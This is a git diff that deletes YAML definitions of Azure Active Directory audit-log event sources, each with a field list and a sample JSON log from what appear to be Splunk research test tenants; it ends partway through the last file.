diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml
deleted file mode 100644
index 2e08550066..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_member_to_role.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Add member to role
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-04-28T16:39:51.9312625Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Add member to role", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "52.177.250.168", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b", "Level": 4, "properties": {"id": "Directory_b425f2d7-2245-4952-b599-61dff8054f2b_FLAW0_72812697", "category": "RoleManagement", "correlationId": "b425f2d7-2245-4952-b599-61dff8054f2b", "result": "success", "resultReason": "", "activityDisplayName": "Add member to role", "activityDateTime": "2023-04-28T16:39:51.9312625+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user": {"id": "3bd47e42-37c9-442f-a2b4-f04de61ef0ce", "displayName": null, "userPrincipalName": "strt_admin@splunkresearch.com", "ipAddress": "52.177.250.168", "roles": []}}, "targetResources": [{"id": "0d664d57-a3ee-4049-8642-280a5c7243ef", "displayName": null, "type": "User", "userPrincipalName": "User1@splunkresearch.com", "modifiedProperties": [{"displayName": "Role.ObjectID", "oldValue": null, "newValue": "\"38bf5baf-7ec7-4bc2-8920-6d4044da12c2\""}, {"displayName": "Role.DisplayName", "oldValue": null, "newValue": "\"Privileged Role Administrator\""}, {"displayName": "Role.TemplateId", "oldValue": null, "newValue": "\"9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3\""}, {"displayName": "Role.WellKnownObjectName", "oldValue": null, "newValue": "\"ApplicationAdministrators\""}], "administrativeUnits": []}, {"id": "38bf5baf-7ec7-4bc2-8920-6d4044da12c2", "displayName": null, "type": "Role", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml
deleted file mode 100644
index cadf2aeba0..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_owner_to_application.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-event_name: Azure Active Directory Add owner to application
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- eventtype
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-06-20T15:54:13.2420879Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Add owner to application", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "20.190.135.43", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040", "Level": 4, "properties": {"id": "Directory_231de5d4-2156-433a-8163-48956bdaa040_C21RW_365283677", "category": "ApplicationManagement", "correlationId": "231de5d4-2156-433a-8163-48956bdaa040", "result": "success", "resultReason": "", "activityDisplayName": "Add owner to application", "activityDateTime": "2023-06-20T15:54:13.2420879+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user": {"id": "4d3f1865-b395-4430-91dc-1b9dd337712e", "displayName": null, "userPrincipalName": "globaladmin@splunkresearch.com", "ipAddress": "20.190.135.43", "roles": []}}, "targetResources": [{"id": "dd92f1af-43d7-47d9-b93c-a78c6b635180", "displayName": null, "type": "User", "userPrincipalName": "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName": "Application.ObjectID", "oldValue": null, "newValue": "\"bb2479d8-5e89-4480-bb7e-3178d5a5d469\""}, {"displayName": "Application.DisplayName", "oldValue": null, "newValue": "\"CloudForge\""}, {"displayName": "Application.AppId", "oldValue": null, "newValue": "\"f0748f3d-45f2-4e2e-a4e1-f2e2b5271bdf\""}], "administrativeUnits": []}, {"id": "bb2479d8-5e89-4480-bb7e-3178d5a5d469", "displayName": null, "type": "Application", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Darwin 22.4.0 Darwin Kernel Version 22.4.0: Mon Mar 6 21:00:17 PST 2023; root:xnu-8796.101.5~3/RELEASE_X86_64; en-US) PowerShell/7.3.4"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml
deleted file mode 100644
index 0dfa31a2a0..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_service_principal.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Add service principal
-fields:
-- _time
-- Level
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2024-02-07T22:31:14.4970418Z", "resourceId": "/tenants/a417c578-c7ee-480d-a225-d48057e74df5/providers/Microsoft.aadiam", "operationName": "Add service principal", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "a417c578-c7ee-480d-a225-d48057e74df5", "resultSignature": "None", "durationMs": 0, "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2", "Level": 4, "properties": {"id": "Directory_ea473f15-64b3-435a-a885-6ee3908919e2_GSOLK_21152854", "category": "ApplicationManagement", "correlationId": "ea473f15-64b3-435a-a885-6ee3908919e2", "result": "success", "resultReason": "", "activityDisplayName": "Add service principal", "activityDateTime": "2024-02-07T22:31:14.4970418+00:00", "loggedByService": "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName": "Herman@phantomengineering.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id": "2dedf863-ac93-4f45-87b3-e32f48145380", "displayName": "Malicious11", "type": "ServicePrincipal", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[]", "newValue": "[true]"}, {"displayName": "AppPrincipalId", "oldValue": "[]", "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName": "DisplayName", "oldValue": "[]", "newValue": "[\"Malicious11\"]"}, {"displayName": "ServicePrincipalName", "oldValue": "[]", "newValue": "[\"e06366ca-8489-4748-b6a2-d7e4332f45c1\"]"}, {"displayName": "Credential", "oldValue": "[]", "newValue": "[{\"CredentialType\":2,\"KeyStoreId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\"KeyGroupId\":\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"}]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\""}, {"displayName": "TargetId.ServicePrincipalNames", "oldValue": null, "newValue": 
"\"e06366ca-8489-4748-b6a2-d7e4332f45c1\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "e06366ca-8489-4748-b6a2-d7e4332f45c1"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml
deleted file mode 100644
index 96b1e771de..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Add_unverified_domain.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Add unverified domain
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-26T13:45:54.1582053Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Add unverified domain", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b", "Level": 4, "properties": {"id": "Directory_bdab88f3-69a4-4e66-883d-5b1e1558e61b_311NT_82497138", "category": "DirectoryManagement", "correlationId": "bdab88f3-69a4-4e66-883d-5b1e1558e61b", "result": "success", "resultReason": "", "activityDisplayName": "Add unverified domain", "activityDateTime": "2023-07-26T13:45:54.1582053+00:00", "loggedByService": "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1", "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com", "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue": "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue": "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml
deleted file mode 100644
index bf673225e6..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Consent_to_application.yml
+++ /dev/null
@@ -1,58 +0,0 @@
-event_name: Azure Active Directory Consent to application
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- eventtype
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.userAgent
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-10-27T16:14:14.9747033Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam", "operationName": "Consent to application", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "resultDescription": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException", "durationMs": 0, "callerIpAddress": "13.85.188.242", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5", "Level": 4, "properties": {"id": "Directory_864210f1-2950-47cb-9e12-1a71dcbdb1d5_DO21D_338329364", "category": "ApplicationManagement", "correlationId": "864210f1-2950-47cb-9e12-1a71dcbdb1d5", "result": "failure", "resultReason": "Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException", "activityDisplayName": "Consent to application", "activityDateTime": "2023-10-27T16:14:14.9747033+00:00", "loggedByService": "Core Directory", "operationType": "Assign", "userAgent": null, "initiatedBy": {"user": {"id": "57e4bd36-9722-4a4a-9729-7203d8e00b72", "displayName": null, "userPrincipalName": "user15@splunkresearch.onmicrosoft.com", "ipAddress": "13.85.188.242", "roles": []}}, "targetResources": [{"id": "6228c72e-8895-4681-bbda-238132dc4f3c", "displayName": "Bad App 1", "type": "Application", "modifiedProperties": [{"displayName": "ConsentContext.IsAdminConsent", "oldValue": null, "newValue": "\"False\""}, {"displayName": "ConsentContext.IsAppOnly", "oldValue": null, "newValue": "\"False\""}, {"displayName": "ConsentContext.OnBehalfOfAll", "oldValue": null, "newValue": "\"False\""}, {"displayName": "ConsentContext.Tags", "oldValue": null, "newValue": "\"WindowsAzureActiveDirectoryIntegratedApp\""}, {"displayName": "ConsentAction.Permissions", "oldValue": null, "newValue": "\"[] => [[Id: AAAAAAAAAAAAAAAAAAAAALSZcc5Sj_NGtUtP2B3pYeI2veRXIpdKSpcpcgPY4Aty, ClientId: 00000000-0000-0000-0000-000000000000, PrincipalId: 57e4bd36-9722-4a4a-9729-7203d8e00b72, 
ResourceId: ce7199b4-8f52-46f3-b54b-4fd81de961e2, ConsentType: Principal, Scope: Mail.Read Mail.Read.Shared Mail.ReadBasic Mail.ReadBasic.Shared Mail.ReadWrite Mail.ReadWrite.Shared Mail.Send Mail.Send.Shared User.Read, CreatedDateTime: , LastModifiedDateTime ]]; \""}, {"displayName": "ConsentAction.Reason", "oldValue": null, "newValue": "\"Risky application detected\""}, {"displayName": "MethodExecutionResult.", "oldValue": null, "newValue": "\"Microsoft.Online.Security.UserConsentBlockedForRiskyAppsException\""}], "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value": "EvoSTS"}, {"key": "AppId", "value": "96f6a3d6-d5aa-4af5-a77a-9319b5283712"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml
deleted file mode 100644
index 1d6e5c1343..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Disable_Strong_Authentication.yml
+++ /dev/null
@@ -1,52 +0,0 @@
-event_name: Azure Active Directory Disable Strong Authentication
-fields:
-- _time
-- Level
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-11T00:01:35.0251899Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Disable Strong Authentication", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e", "Level": 4, "properties": {"id": "Directory_7e3ee05c-ce4f-4ff1-8230-55555c25c97e_DADCR_14299826", "category": "UserManagement", "correlationId": "7e3ee05c-ce4f-4ff1-8230-55555c25c97e", "result": "success", "resultReason": "", "activityDisplayName": "Disable Strong Authentication", "activityDateTime": "2023-07-11T00:01:35.0251899+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "oops@splunkresearch.com", "ipAddress": "", "roles": []}}, "targetResources": [{"id": "94b969a3-11cb-4075-a1fd-9fee3daf692e", "displayName": null, "type": "User", "userPrincipalName": "Abigail.Clark@splunkresearch.com", "modifiedProperties": [{"displayName": "StrongAuthenticationRequirement", "oldValue": "[{\"RelyingParty\":\"*\",\"State\":1,\"RememberDevicesNotIssuedBefore\":\"2023-07-11T00:01:26+00:00\"}]", "newValue": "[]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"StrongAuthenticationRequirement\""}], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml
deleted file mode 100644
index 840e226dde..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Enable_account.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Enable account
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.modifiedProperties{}.displayName
-- properties.targetResources{}.modifiedProperties{}.newValue
-- properties.targetResources{}.modifiedProperties{}.oldValue
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-24T14:28:15.2223487Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Enable account", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413188", "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497", "result": "success", "resultReason": "", "activityDisplayName": "Enable account", "activityDateTime": "2023-07-24T14:28:15.2223487+00:00", "loggedByService": "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": null, "type": "User", "userPrincipalName": "testuser@splunkresearch.com", "modifiedProperties": [{"displayName": "AccountEnabled", "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"AccountEnabled\""}], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml
deleted file mode 100644
index 05aa34c116..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Invite_external_user.yml
+++ /dev/null
@@ -1,52 +0,0 @@
-event_name: Azure Active Directory Invite external user
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-13T00:29:59.5100003Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Invite external user", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs": 0, "callerIpAddress": "40.126.4.40", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99", "Level": 4, "properties": {"id": "Invited Users_e7d580a6-eaac-4f82-843c-40b0b5f3cf99_YNUMP_7291793", "category": "UserManagement", "correlationId": "e7d580a6-eaac-4f82-843c-40b0b5f3cf99", "result": "success", "resultReason": null, "activityDisplayName": "Invite external user", "activityDateTime": "2023-07-13T00:29:59.5100003+00:00", "loggedByService": "Invited Users", "operationType": "Add", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "oopsr@splunkresearch.com", "ipAddress": "40.126.4.40", "roles": []}}, "targetResources": [{"id": "f416526a-17ee-4129-8ca9-f5ee55f69f34", "displayName": "oops", "type": "User", "userPrincipalName": "oops360_gmail.com#EXT#@strtadminsplunkresearch.onmicrosoft.com", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "oid", "value": "728989f4-eb3d-45c2-8741-2f2af4e485ce"}, {"key": "tid", "value": "fc69e276-e9e8-4af9-9002-1e410d77244e"}, {"key": "ipaddr", "value": "2601:646:a000:200:c4db:f288:7e28:21b3"}, {"key": "wids", "value": "62e90394-69f5-4237-9190-012177145e10"}, {"key": "InvitationId", "value": "65c7d12f-c6f3-44f0-8fad-4f57a1020484"}, {"key": "invitedUserEmailAddress", "value": "oops360@gmail.com"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml
deleted file mode 100644
index 1abaf67249..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Reset_password_(by_admin).yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Reset password (by admin)
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
-- linecount
-- operationName
-- operationVersion
-- properties.activityDateTime
-- properties.activityDisplayName
-- properties.additionalDetails{}.key
-- properties.additionalDetails{}.value
-- properties.category
-- properties.correlationId
-- properties.id
-- properties.initiatedBy.user.displayName
-- properties.initiatedBy.user.id
-- properties.initiatedBy.user.ipAddress
-- properties.initiatedBy.user.userPrincipalName
-- properties.loggedByService
-- properties.operationType
-- properties.result
-- properties.resultReason
-- properties.targetResources{}.displayName
-- properties.targetResources{}.id
-- properties.targetResources{}.type
-- properties.targetResources{}.userPrincipalName
-- properties.userAgent
-- punct
-- resourceId
-- resultDescription
-- resultSignature
-- source
-- sourcetype
-- splunk_server
-- tenantId
-- time
-- timeendpos
-- timestartpos
-example_log: '{"time": "2023-07-24T14:28:55.0648789Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam", "operationName": "Reset password (by admin)", "operationVersion": "1.0", "category": "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "resultDescription": "None", "durationMs": 0, "callerIpAddress": "40.81.4.144", "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "Level": 4, "properties": {"id": "SSPR_724ff6ae-0f36-4f2f-a20f-f043e0c73006_P1CQE_8605821", "category": "UserManagement", "correlationId": "724ff6ae-0f36-4f2f-a20f-f043e0c73006", "result": "success", "resultReason": "None", "activityDisplayName": "Reset password (by admin)", "activityDateTime": "2023-07-24T14:28:55.0648789+00:00", "loggedByService": "Self-service Password Management", "operationType": "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress": "40.81.4.144", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": "test", "type": "User", "userPrincipalName": "testuser@splunkresearch.com", "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key": "OnPremisesAgent", "value": "None"}]}}'
diff --git a/data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml b/data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml
deleted file mode 100644
index 58de93e431..0000000000
--- a/data_sources/cloud/event_sources/Azure_Active_Directory_Set_domain_authentication.yml
+++ /dev/null
@@ -1,53 +0,0 @@
-event_name: Azure Active Directory Set domain authentication
-fields:
-- _time
-- Level
-- callerIpAddress
-- category
-- correlationId
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- durationMs
-- host
-- index
